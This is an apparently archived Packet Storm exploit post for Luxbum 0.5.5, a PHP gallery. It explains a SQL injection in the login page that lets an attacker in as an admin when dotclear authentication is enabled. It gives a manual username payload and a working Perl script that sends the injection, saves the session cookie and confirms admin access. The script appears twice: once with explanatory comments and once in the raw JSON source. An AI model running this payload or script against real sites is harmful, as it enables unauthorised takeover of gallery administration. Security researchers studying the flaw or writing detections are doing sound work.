ID PACKETSTORM:77364 Type packetstorm Reporter knxone Modified 2009-05-08T00:00:00
Description
` __
/\ \
\ \ \/'\ ___ __ _ ___ ___ __
\ \ , < /' _ `\ /\ \/'\ / __`\ /' _ `\ /'__`\
\ \ \\`\ /\ \/\ \\/> <//\ \L\ \/\ \/\ \/\ __/
\ \_\ \_\ \_\ \_\/\_/\_\ \____/\ \_\ \_\ \____\
\/_/\/_/\/_/\/_/\//\/_/\/___/ \/_/\/_/\/____/
Better to be alone than in bad company
+============+
| MAIN INFOS |
+============+
Software name: luxbum (PHP Web gallery)
Version: 0.5.5/stable
Flaw type: sql injection -> auth bypass
URL: http://www.luxbum.net/
Found by: knxone <knxone[at]webmail(d0t)ru>
Greetings: _Pirata_ from this famous irc server ;)
+=========+
| CONCEPT |
+=========+
Luxbum allows authentication using a dotclear username and password via MySQL,
while the default auth mechanism uses an md5 hash of the password stored in a PHP file.
If you trace all the code from login form to admin panel, you'll notice that
user input isn't filtered in manager.php or mysql.inc.php.
So if you use dotclear auth in luxbum, SQL injection is possible, but to bypass
authentication the query has to return at least one row, and that row has to
be a dotclear admin.
In dotclear, the table dc_user stores in the column "user_super" the super
admin status. If it's == 1 then the user is super-admin. Since the luxbum auth
mechanism already has full access to dotclear users' data, exploiting is
very easy and doesn't require disclosure of the dotclear database details (DB
name, username, password, prefix etc.).
+=========+
| EXPLOIT |
+=========+
- requires magic_quotes = Off
- requires use of dotclear auth (not default)
Go to: http://host/luxbum/manager.php
Enter as Username: ' OR user_super=1 #
Enter as Password: xxxxxxxxxxxxxxxxxxxx
+==============+
| EXPLOIT CODE |
+==============+
#!/usr/bin/perl -w
# luxbum 0.5.5 auth bypass via sql injection.
# requires magic_quotes Off and use of dotclear auth
# returns 0 if successful, else 1
# ./luxbum http://host.tld/luxbumrootdir
# By knxone <knxone[at]webmail(d0t)ru>
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use Term::ANSIColor qw(:constants);
# Colours are reset after every print, so the BOLD/GREEN/RED constants below
# cannot leak into later terminal output.
$Term::ANSIColor::AUTORESET = 1;
# Exactly one argument (the gallery base URL) is required; anything else
# prints usage and exits 1. The defined() test is subsumed by the count check.
help() if ( ! defined($ARGV[0]) || scalar(@ARGV) != 1 );
# The cookie jar persists the server's session cookie to ./.cookies in the
# current directory (autosave), so the obtained session survives on disk
# after the script exits. The agent string is arbitrary.
my $ua = LWP::UserAgent->new(
agent => 'Mozilla/4.73 [en] (U; Windows 3.1; Internet Explorer 2.0)',
cookie_jar => HTTP::Cookies->new(
file => ".cookies",
autosave => 1
)
);
# Login endpoint. $ARGV[0] is used verbatim, so a trailing slash in the
# argument yields a double slash in the path.
my $url = $ARGV[0]."/manager.php?p=login";
# First we inject to open a valid session
my $req = HTTP::Request->new( POST => $url ) ;
$req->content_type("application/x-www-form-urlencoded");
# The body is hand-encoded: the username decodes to  ' OR user_super=1#
# (the same value as the manual steps above) and the password is 32 'x'
# characters. Per the advisory this only works when the application
# interpolates the raw username into its SQL (magic_quotes off, dotclear
# auth enabled); prepared statements / parameter binding on the server
# side close the hole. This literal string in the POST body is also what a
# web log or WAF rule would see.
$req->content("username='+OR+user_super%3D1%23&password=".'x'x32);
my $response = $ua->request($req);
# Success heuristic: any response that is not 4xx/5xx (3xx included, since
# LWP does not follow POST redirects by default) and whose body lacks the
# "message_ko" marker is taken as a passed login.
if ( ! $response->is_error && $response->content !~ m/message_ko/ ) {
print BOLD GREEN "Auth bypass successful :-)\n";
} else {
print BOLD RED "Auth bypass failed :-(\n";
exit(1);
}
# Then we check if we've really done it
# The cookie from the jar is sent with this GET; the "h1_admin" marker in
# the response body is taken as proof of an admin session. Both markers are
# tied to this version's HTML, so a negative result is not conclusive.
$response = $ua->get($ARGV[0]."/manager.php");
if ( $response->content =~ m/h1_admin/ ) {
print BOLD GREEN "Access Granted as gallery Admin at ".$ARGV[0]." :-)))\n";
exit(0);
} else {
print BOLD RED "Access Denied at ".$ARGV[0]." :-(\n";
exit(1);
}
# Print the one-line usage text to STDOUT and terminate with status 1.
# Called when the script is started with anything other than exactly one
# argument; it never returns.
sub help {
    printf "Usage: %s http://host.tld/luxbumrootdir\n", $0;
    exit(1);
}
#EOF
`
{"id": "PACKETSTORM:77364", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Luxbum 0.5.5 SQL Injection", "description": "", "published": "2009-05-08T00:00:00", "modified": "2009-05-08T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/77364/Luxbum-0.5.5-SQL-Injection.html", "reporter": "knxone", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:04", "viewCount": 1, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:17:04", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:04", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/77364/luxbum-sql.txt", "sourceData": "` __ \n/\\ \\ \n\\ \\ \\/'\\ ___ __ _ ___ ___ __ \n\\ \\ , < /' _ `\\ /\\ \\/'\\ / __`\\ /' _ `\\ /'__`\\ \n\\ \\ \\\\`\\ /\\ \\/\\ \\\\/> <//\\ \\L\\ \\/\\ \\/\\ \\/\\ __/ \n\\ \\_\\ \\_\\ \\_\\ \\_\\/\\_/\\_\\ \\____/\\ \\_\\ \\_\\ \\____\\ \n\\/_/\\/_/\\/_/\\/_/\\//\\/_/\\/___/ \\/_/\\/_/\\/____/ \nBetter to be alone than in bad company \n \n \n \n \n \n+============+ \n| MAIN INFOS | \n+============+ \n \nSoftware name: luxbum (PHP Web gallery) \nVersion: 0.5.5/stable \nFlaw type: sql injection -> auth bypass \nURL: http://www.luxbum.net/ \nFound by: knxone <knxone[at]webmail(d0t)ru> \nGreetings: _Pirata_ from this famous irc server ;) \n \n \n \n+=========+ \n| CONCEPT | \n+=========+ \n \nLuxbum allows authentification using dotclear username and password via MySQL, \nwhile the default auth mechanism uses a md5 hash of the pass in a PHP file. \n \nIf you trace all the code from login form to admin panel, you'll notice that \nuser input isn't filtered in manager.php or mysql.inc.php. \n \nSo if you use dotclear auth in luxbum, SQL injection is possible but, in order \nto bypass, we need to return at least one row to get it working and it has to \nbe a dotclear admin. 
\n \nIn dotclear, the table dc_user stores in the column \"user_super\" the super \nadmin status. If it's == 1 then the user is super-admin. Since the luxbum auth \nmechanism already fully accesses to dotclear users' data , exploiting is \nvery easy and doesn't require the disclosure of dotclear database infos (DB \nname, username, pass, prefix etc.). \n \n \n \n+=========+ \n| EXPLOIT | \n+=========+ \n \n- requires magic_quotes = Off \n- requires use of dotclear auth (not default) \n \n \nGo to: http://host/luxbum/manager.php \nEnter as Username: ' OR user_super=1 # \nEnter as Password: xxxxxxxxxxxxxxxxxxxx \n \n \n \n+==============+ \n| EXPLOIT CODE | \n+==============+ \n \n#!/usr/bin/perl -w \n# luxbum 0.5.5 auth bypass via sql injection. \n# requires magic_quotes Off and use of dotclear auth \n# returns 0 if successful, else 1 \n# ./luxbum http://host.tld/luxbumrootdir \n# By knxone <knxone[at]webmail(d0t)ru> \nuse strict; \nuse LWP::UserAgent; \nuse HTTP::Cookies; \nuse Term::ANSIColor qw(:constants); \n$Term::ANSIColor::AUTORESET = 1; \nhelp() if ( ! defined($ARGV[0]) || scalar(@ARGV) != 1 ); \n \n \nmy $ua = LWP::UserAgent->new( \nagent => 'Mozilla/4.73 [en] (U; Windows 3.1; Internet Explorer 2.0)', \ncookie_jar => HTTP::Cookies->new( \nfile => \".cookies\", \nautosave => 1 \n) \n); \nmy $url = $ARGV[0].\"/manager.php?p=login\"; \n \n# First we inject to open a valid session \nmy $req = HTTP::Request->new( POST => $url ) ; \n$req->content_type(\"application/x-www-form-urlencoded\"); \n$req->content(\"username='+OR+user_super%3D1%23&password=\".'x'x32); \nmy $response = $ua->request($req); \nif ( ! 
$response->is_error && $response->content !~ m/message_ko/ ) { \nprint BOLD GREEN \"Auth bypass successful :-)\\n\"; \n} else { \nprint BOLD RED \"Auth bypass failed :-(\\n\"; \nexit(1); \n} \n \n \n# Then we check if we've really done it \n$response = $ua->get($ARGV[0].\"/manager.php\"); \nif ( $response->content =~ m/h1_admin/ ) { \nprint BOLD GREEN \"Access Granted as gallery Admin at \".$ARGV[0].\" :-)))\\n\"; \nexit(0); \n} else { \nprint BOLD RED \"Access Denied at \".$ARGV[0].\" :-(\\n\"; \nexit(1); \n} \n \n \nsub help { \nprint \"Usage: \".$0.\" http://host.tld/luxbumrootdir\\n\"; \nexit(1); \n} \n \n#EOF \n \n \n \n`\n"}